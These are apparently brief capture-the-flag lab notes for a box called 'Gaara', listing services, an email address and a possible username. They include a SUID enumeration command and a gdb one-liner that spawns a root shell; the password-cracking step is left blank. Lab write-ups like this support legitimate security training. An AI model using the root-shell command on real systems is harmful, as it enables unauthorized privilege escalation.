Gaara 192.168.130.142 (easy)
OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
http Apache httpd 2.4.38 ((Debian))
email dyuuwijaya@yahoo.com
dguuwijaga
Cracking ssh pass with:
Checking suid bits
find / -perm -u=s -type f 2>/dev/null # SUID (chmod 4000) - run as the owner, not the user who started it.
SUID gbt give us an instant root shell!
/usr/bin/gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit
Last updated